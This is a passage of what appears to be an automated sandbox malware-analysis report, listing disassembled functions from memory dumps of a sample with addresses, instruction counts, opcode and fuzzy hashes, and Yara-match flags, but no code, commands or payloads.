                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ZNE
                                                    • API String ID: 0-4129727968
                                                    • Opcode ID: 84d489b7221828ef1a56a56abcbccf56d9c0743d05d6cc556789ea98463e3c78
                                                    • Instruction ID: 380f929a6a1fa323e73d8efe2ff6bcea2fd3c0267182fab6ec90a05b23378290
                                                    • Opcode Fuzzy Hash: 84d489b7221828ef1a56a56abcbccf56d9c0743d05d6cc556789ea98463e3c78
                                                    • Instruction Fuzzy Hash: A93118B81057518BD728CF24C4A4B62B7B2FF9A308F18898DC8964F7A5D736E406CB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041E3A30 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: E&eb
                                                    • API String ID: 0-175690455
                                                    • Opcode ID: 9f8011bd02dec7415c40c6553cd6724d302f30c3f8c52a5d7ec60bdd3f404cdf
                                                    • Instruction ID: 50b11c0654110cba77a07a767736d07e4e5e6a97be14423ea95563452109b4f8
                                                    • Opcode Fuzzy Hash: 9f8011bd02dec7415c40c6553cd6724d302f30c3f8c52a5d7ec60bdd3f404cdf
                                                    • Instruction Fuzzy Hash: DC31D376600B418BDB25DF75C8C1B76B3E2AF89304F188A6CD4AAC7A50E776F442C741
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041F234 Relevance: 1.4, Strings: 1, Instructions: 105COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: ZNE
                                                    • API String ID: 0-4129727968
                                                    • Opcode ID: 84d489b7221828ef1a56a56abcbccf56d9c0743d05d6cc556789ea98463e3c78
                                                    • Instruction ID: e8301e92829d386e43619fbef17b13c43e98054b40a232f52eb9d4929e55c88f
                                                    • Opcode Fuzzy Hash: 84d489b7221828ef1a56a56abcbccf56d9c0743d05d6cc556789ea98463e3c78
                                                    • Instruction Fuzzy Hash: F3314CB41057018BD724CF24C4A0763B7B2FF8A308F18899DC8964F7A5D33AE846CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041F2984 Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8<D
                                                    • API String ID: 0-3615199564
                                                    • Opcode ID: 3cd4d0255acbd83483be78b174a1aa4669952a0eaedb958d25d8ff155b1fdd22
                                                    • Instruction ID: 9f3387236e76a08311ffdb4890e8e5ee709335b813886b8fc5f3e0942482f8f7
                                                    • Opcode Fuzzy Hash: 3cd4d0255acbd83483be78b174a1aa4669952a0eaedb958d25d8ff155b1fdd22
                                                    • Instruction Fuzzy Hash: 20216D74615B018BD728CF11C8E472BB7B2AF95308F144A1CCA9347A55D776F406CB84
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042271D Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: 8<D
                                                    • API String ID: 0-3615199564
                                                    • Opcode ID: 43410bef525b88c800e3c04ccf6c800d161e88d638178f6c8cf8903a683c1836
                                                    • Instruction ID: 5c2adfd8d6504ce2570952b71e97041bc4169224e8eb2d27b2c28b15fc8cae37
                                                    • Opcode Fuzzy Hash: 43410bef525b88c800e3c04ccf6c800d161e88d638178f6c8cf8903a683c1836
                                                    • Instruction Fuzzy Hash: 7A219D74715B118BD728CF15D4A472BB3B2BB95305F64491DC98307B46DB39FA058B88
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041EE6B8 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID: y?E
                                                    • API String ID: 0-4194899438
                                                    • Opcode ID: 9acd8b4add1ab6046a7e71170a056eb61df3bd2eebd4592d8056683add2b4c17
                                                    • Instruction ID: e30658809099367a060aaeee480836de5320c0c4005a2512c0e6b9a7b77e317c
                                                    • Opcode Fuzzy Hash: 9acd8b4add1ab6046a7e71170a056eb61df3bd2eebd4592d8056683add2b4c17
                                                    • Instruction Fuzzy Hash: D4F0E5B07D03407FF6388B05CC93F2772A59B86F08F209018B3023F6E1D5A2B8908A5D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0041E451 Relevance: 1.3, Strings: 1, Instructions: 34COMMON
                                                    Download Yara Rule
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID: y?E
                                                    • API String ID: 0-4194899438
                                                    • Opcode ID: 9acd8b4add1ab6046a7e71170a056eb61df3bd2eebd4592d8056683add2b4c17
                                                    • Instruction ID: 03feb15d6327caf01c6f4e3c3abfcf3137b2db18e9f8d0a67c58148e2840a2d0
                                                    • Opcode Fuzzy Hash: 9acd8b4add1ab6046a7e71170a056eb61df3bd2eebd4592d8056683add2b4c17
                                                    • Instruction Fuzzy Hash: 37F0C9747D0240BAF6348B069C53F2672A59786F08F246019B3022EAE1D691B850865D
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D7F17 Relevance: .9, Instructions: 863COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 29d67ce7238868a644816868104970473f541adc91c274d36c458954bbbb7672
                                                    • Instruction ID: 6683befd279bb584add7055365acd664b0f011a3ad4bf83d88bc76add606d5f5
                                                    • Opcode Fuzzy Hash: 29d67ce7238868a644816868104970473f541adc91c274d36c458954bbbb7672
                                                    • Instruction Fuzzy Hash: 1452D0B16087118BC725EF18D8C06BAB3E1FFC4314F198A6DD9A697285E734F452CB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00407CB0 Relevance: .9, Instructions: 863COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 2f5b37d1fe015b661790963238e08819ac14a54e74e6a3a607d9c5fcffe0d60f
                                                    • Instruction ID: 6123c9fa1a0c5c23547d463d95811ffb899c8b9f2dceb4d2bbc9e15ae19837ec
                                                    • Opcode Fuzzy Hash: 2f5b37d1fe015b661790963238e08819ac14a54e74e6a3a607d9c5fcffe0d60f
                                                    • Instruction Fuzzy Hash: 3252F5315087118BC725DF18D98067AB3E1FFD4314F158A3ED9C6A7385EB39A851CB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D34C7 Relevance: .7, Instructions: 739COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f1bbd0d5ea9ee9cf7a58fdb12da3e69cd8085a8195a01fc2736909e61018c993
                                                    • Instruction ID: 5fc9325200dfefed1466f63209f7bfd95a038d551a584cc3502a7f38bb615e39
                                                    • Opcode Fuzzy Hash: f1bbd0d5ea9ee9cf7a58fdb12da3e69cd8085a8195a01fc2736909e61018c993
                                                    • Instruction Fuzzy Hash: 316270B16083468FC719CF19C0D066AF7E1BF88314F198AADE8E95B342D735B955CB82
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403260 Relevance: .7, Instructions: 739COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: f1bbd0d5ea9ee9cf7a58fdb12da3e69cd8085a8195a01fc2736909e61018c993
                                                    • Instruction ID: 183ead6a6a3b3957c74de0171a2814dc62c15f2b0c5035c8a28ca403f7d96058
                                                    • Opcode Fuzzy Hash: f1bbd0d5ea9ee9cf7a58fdb12da3e69cd8085a8195a01fc2736909e61018c993
                                                    • Instruction Fuzzy Hash: 5162A1716083418FC715CF19C08066AFBE5FF98315F188AAEE4C96B392D739E985CB85
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04204857 Relevance: .7, Instructions: 654COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: d577f8b6c56b274e80b45f7ec9f9e445c8945c558a7b4c5da7356b539d35d226
                                                    • Instruction ID: 6e8080b3c671db649c8a0bce5593371019684259dd1c8247f85bf65b22ebbb74
                                                    • Opcode Fuzzy Hash: d577f8b6c56b274e80b45f7ec9f9e445c8945c558a7b4c5da7356b539d35d226
                                                    • Instruction Fuzzy Hash: A1328C706183428FD714DF18C890B2EBBE5BF85318F188A2CE6D18B392D775E945CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004345F0 Relevance: .7, Instructions: 654COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: e308bd41976687f2421730163e4b01bfaff8c7211bdb8ef0c48d57d45bc6bc9e
                                                    • Instruction ID: 67df1fc7a9d94662ebbb09efddaafb4d80ad0b85446f25ab8849be5023324442
                                                    • Opcode Fuzzy Hash: e308bd41976687f2421730163e4b01bfaff8c7211bdb8ef0c48d57d45bc6bc9e
                                                    • Instruction Fuzzy Hash: BE328C746083428BD714CF18C49076FBBE1BBC9318F285A2EE5E18B391D779E905CB96
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D3FD7 Relevance: .6, Instructions: 606COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec67b066431c46d51f9328a4208a84b5b3b4f664a8950917e00fe8c9c4d64142
                                                    • Instruction ID: 84037e6d311552cd69f38d21a1593bf2034fbef613d31bb0ce259b1f64819ef6
                                                    • Opcode Fuzzy Hash: ec67b066431c46d51f9328a4208a84b5b3b4f664a8950917e00fe8c9c4d64142
                                                    • Instruction Fuzzy Hash: 7B4224B0614B518FC768CF29C9D066ABBF1BF85310B918A2DE5978BB90E735F845CB10
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00403D70 Relevance: .6, Instructions: 606COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec67b066431c46d51f9328a4208a84b5b3b4f664a8950917e00fe8c9c4d64142
                                                    • Instruction ID: 62fdf35defcfb638864364b138b09febc4641995644d6293f545bd88fdf66422
                                                    • Opcode Fuzzy Hash: ec67b066431c46d51f9328a4208a84b5b3b4f664a8950917e00fe8c9c4d64142
                                                    • Instruction Fuzzy Hash: 08424AB0514B118FC368CF29C58066ABBF1FF95310B508A2ED6979BB90D739F945CB18
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041D6297 Relevance: .5, Instructions: 506COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 31b2b0062e70864b20366a495c5774b7a6bf2d0b40f2cca7b68ee2487c339e4a
                                                    • Instruction ID: d02b9dc6f8062afcdf3932c998526f909334841ed73f484dd64e630593b6252d
                                                    • Opcode Fuzzy Hash: 31b2b0062e70864b20366a495c5774b7a6bf2d0b40f2cca7b68ee2487c339e4a
                                                    • Instruction Fuzzy Hash: 7802B376608340CFDB18CF19C89076ABBE2AFC9304F0988ADF9898B351D775E905CB56
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00406030 Relevance: .5, Instructions: 506COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 31b2b0062e70864b20366a495c5774b7a6bf2d0b40f2cca7b68ee2487c339e4a
                                                    • Instruction ID: 062872ac450fc33e260f73cb738b3d403bc6c21fdc564d14ea141bb3115bf4ac
                                                    • Opcode Fuzzy Hash: 31b2b0062e70864b20366a495c5774b7a6bf2d0b40f2cca7b68ee2487c339e4a
                                                    • Instruction Fuzzy Hash: ED02C5356083408FDB14CF19C88075BBBE2AFC9304F09846EF9899B396D679DD15CB9A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041F5BB6 Relevance: .4, Instructions: 439COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec12dda6b8c965bff763c0c3227da0db8c0e1b09c077717e96a1254aac635b77
                                                    • Instruction ID: a1ae49222ef0a153ab44cf5c08282b9fa3bca6eeaaad2a5985ca6e29f196ef64
                                                    • Opcode Fuzzy Hash: ec12dda6b8c965bff763c0c3227da0db8c0e1b09c077717e96a1254aac635b77
                                                    • Instruction Fuzzy Hash: BFE18F70504B428BD339CF39C4A47A2BBE2BF56304F584A6DD1E78BA96D739B006CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 0042594F Relevance: .4, Instructions: 439COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ec12dda6b8c965bff763c0c3227da0db8c0e1b09c077717e96a1254aac635b77
                                                    • Instruction ID: 8b42c20ed853b2c5120942c8a3e21587b7f358ab26ae15a5b5aef68f1e61b5b7
                                                    • Opcode Fuzzy Hash: ec12dda6b8c965bff763c0c3227da0db8c0e1b09c077717e96a1254aac635b77
                                                    • Instruction Fuzzy Hash: DDE18E70604F528BD329CF35D0947A3BBE2BB56304F948A6EC0E78B795D739A405CB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041F5C39 Relevance: .4, Instructions: 438COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a03072206e88402169ecfedf5f3129bd97e0d86f37120bb580258a128e7ceb5f
                                                    • Instruction ID: 01ca1447987e4a64100effd1e87d194f075b4853d9297c03d55b67d728463a8f
                                                    • Opcode Fuzzy Hash: a03072206e88402169ecfedf5f3129bd97e0d86f37120bb580258a128e7ceb5f
                                                    • Instruction Fuzzy Hash: 08E18F70504B428BD339CF39C4A47A2BBE2BF56304F588A6DD1E78B696D739B006CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004259D2 Relevance: .4, Instructions: 438COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a03072206e88402169ecfedf5f3129bd97e0d86f37120bb580258a128e7ceb5f
                                                    • Instruction ID: 9060c463f8688e917841db1e630077314adc701bc0e59b56afbb7da05250ca72
                                                    • Opcode Fuzzy Hash: a03072206e88402169ecfedf5f3129bd97e0d86f37120bb580258a128e7ceb5f
                                                    • Instruction Fuzzy Hash: 9AE18F70604F528BD329CF35C0947A3BBE1BB56304F948A6ED0E78B791D739A405CB98
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041F5C34 Relevance: .4, Instructions: 388COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf57ecc19b49e91f9773b5534ab7818fce68baed4b59fa24d30d092034757044
                                                    • Instruction ID: a959141bc7f4160aa1ec6c4c642dec89495d0759f65cca83db245e694b0906ae
                                                    • Opcode Fuzzy Hash: bf57ecc19b49e91f9773b5534ab7818fce68baed4b59fa24d30d092034757044
                                                    • Instruction Fuzzy Hash: ABD19270544B428BD32ACB34C8A47B2BBE2BF56308F4849ADD5E74B696D739B007CB54
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004259CD Relevance: .4, Instructions: 388COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: bf57ecc19b49e91f9773b5534ab7818fce68baed4b59fa24d30d092034757044
                                                    • Instruction ID: b7a2e448555a667e040e89e1c38ca0c8df00110f0e621bfe987a146603a8d53c
                                                    • Opcode Fuzzy Hash: bf57ecc19b49e91f9773b5534ab7818fce68baed4b59fa24d30d092034757044
                                                    • Instruction Fuzzy Hash: 21D1B170204F528BD326CB35C4947B3BBE2BB56304F88496EC0E74B696D739A406CB58
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041F0F07 Relevance: .4, Instructions: 371COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 6607876e061243bbbe51d6e855e405a6dd1e9af696687e075323f4663d15a4ae
                                                    • Instruction ID: 46b8d146618fa88f1f5acb81f9498357222b838f42c1a44a4fdaedc75fdc2e14
                                                    • Opcode Fuzzy Hash: 6607876e061243bbbe51d6e855e405a6dd1e9af696687e075323f4663d15a4ae
                                                    • Instruction Fuzzy Hash: D6C18FB1A08341DBD714CF28C8D076BB7E1EF95324F188A6DE99587381E775E806CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04209A37 Relevance: .3, Instructions: 294COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 4398d3ec5229dcc9cb4a6d137b68200e10fc10d2194113c9dd1325f0f37944c1
                                                    • Instruction ID: f0c4c97ffbce02e229df1e5512372ff23ccc9ff7bfd948ad5831e67341e5f1ed
                                                    • Opcode Fuzzy Hash: 4398d3ec5229dcc9cb4a6d137b68200e10fc10d2194113c9dd1325f0f37944c1
                                                    • Instruction Fuzzy Hash: 9291AAB17153029BD724CF18C890B6AB7E1FF88714F158A1CE8869B392D734EC91CB92
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 004397D0 Relevance: .3, Instructions: 294COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1843109267.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000000.00000002.1843109267.0000000000449000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_400000_o7b91j8vnJ.jbxd
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: 8c03f85c1f55c9f6509be6fcd77ab33d59f934990a7c18cb0943ca120ae14ba5
                                                    • Instruction ID: 4a505e550d51f1ebeea338d3f34a7da1655b731f72bf0528fb24977227cb4b42
                                                    • Opcode Fuzzy Hash: 8c03f85c1f55c9f6509be6fcd77ab33d59f934990a7c18cb0943ca120ae14ba5
                                                    • Instruction Fuzzy Hash: 3891DBB06043029BDB18DF18C890B6BB3E1FF89714F159A1DE8859B391D778EC11CB8A
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 041DF824 Relevance: .2, Instructions: 231COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: ee39f92c32734c17aedb70555300ca92187ae72a2831e6ef2b1fce8f91fd4382
                                                    • Instruction ID: f85244fa2801b703822744f4f1b12cf47406a5fada49dd676716b8343a4fe7a4
                                                    • Opcode Fuzzy Hash: ee39f92c32734c17aedb70555300ca92187ae72a2831e6ef2b1fce8f91fd4382
                                                    • Instruction Fuzzy Hash: CB71DD51A8C3D78FC30696F5487C199FFC0AE46130B29A39FD4E6A7182D2AC56A7D343
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04203F77 Relevance: .2, Instructions: 229COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_0_2_41d0000_o7b91j8vnJ.jbxd
                                                    Yara matches
                                                    Similarity
                                                    • API ID:
                                                    • String ID:
                                                    • API String ID:
                                                    • Opcode ID: a40881f297f571096e4e73b3fa4590635544a00c57deacf067d309787e08abb0
                                                    • Instruction ID: 89f1b6ea22db1f9b53e55cf25a9e937e0ebb48a93ce35fda1a7f604a19a38876
                                                    • Opcode Fuzzy Hash: a40881f297f571096e4e73b3fa4590635544a00c57deacf067d309787e08abb0
                                                    • Instruction Fuzzy Hash: D681BA707083029BE318DF14C894B2BFBE2BB95358F24C91CEA955B392D775E845CB86
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 04201CD7 Relevance: .2, Instructions: 186COMMON
                                                    Download Yara Rule
                                                    Memory Dump Source
                                                    • Source File: 00000000.00000002.1844920776.00000000041D0000.00000040.00001000.00020000.00000000.sdmp, Offset: 041D0000, based on PE: false
